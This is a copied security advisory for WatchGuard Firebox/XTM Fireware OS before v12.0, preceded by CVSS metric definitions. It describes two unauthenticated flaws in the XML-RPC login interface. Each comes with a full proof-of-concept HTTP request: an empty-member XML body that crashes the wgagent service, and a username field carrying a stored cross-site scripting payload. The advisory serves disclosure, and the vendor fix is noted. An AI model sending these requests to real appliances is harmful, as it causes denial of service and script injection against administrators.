The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Watchguard Firebox / XTM XML-RPC Empty Member Denial Of Service
Watchguardas Firebox and XTM are a series of enterprise grade network
security appliances providing advanced security services like next
generation firewall, intrusion prevention, malware detection and
blockage and others. Two vulnerabilities were discovered affecting the
XML-RPC interface of the Web UI used to manage Fireware OS, the
operating system running on Watchguard Firebox and XTM appliances. To
exploit any of the flaws discovered, no authentication on the Web UI
is required.
---------------------------------------------------------------------------
XML-RPC Empty Member DoS
Versions Affected
Fireware OS versions below v12.0 were found to be vulnerable.
CVE Reference
Vendor assigned internal id FBX-5312 to vulnerability and will release
a knowledge Base article following this advisory.
Vendor Fix
Vendor fixed the vulnerability in their v12 release.
Credit
David Fernandez of Sidertia Solutions
Description
If a login attempt is made in the XML-RPC interface with a XML message
containing and empty member tag, the wgagent crashes logging out any
user with a session opened in the UI. By continuously executing the
failed logging attempts, the device will be impossible to be managed
using the UI. It was not tested if this flaw causes similar lockout
and degradation in connectivity like my previous CVE-2017-8056.
Proof of concept
Below is an example of the request that causes a crash in the XML-RPC wgagent:
POST /agent/login HTTP/1.1
Host: fireware-host:4100
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: es,en;q=0.8,ca;q=0.6
Cookie: sessionid=dasdasdas
Content-Length: 207
Content-Type: application/xml
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>
Links
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia
---------------------------------------------------------------------
XML-RPC Username Stored Cross Site Scripting
Versions Affected
Fireware OS versions below v12.0 were found to be vulnerable.
CVE Reference
Vendor assigned internal id FBX-5313 to vulnerability and will release
a knowledge Base article following this advisory.
Vendor Fix
Vendor fixed the vulnerability in their v12 release.
Credit
David Fernandez of Sidertia Solutions
Description
When a failed login attempt is made to the login endpoint of the
XML-RPC interface, if javascript code, properly encoded to be consumed
by XML parsers, is embedded as value of the user tag, the code will be
rendered in the context of any logged in user in the Web UI visiting
aTraffic Monitora sections aEventsa and aAlla. As a side effect, no
further events will be visible in the Traffic Monitor until the device
is restarted.
Proof of concept
POST /agent/login HTTP/1.1
Host: fireware-host:4100
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: es,en;q=0.8,ca;q=0.6
Cookie: sessionid=dasdasdas
Content-Length: 298
Content-Type: application/xml
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>aa<img
onerror=alert('xss')
src=>a</string></value></member></struct></value></param></params></methodCall>
Links
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum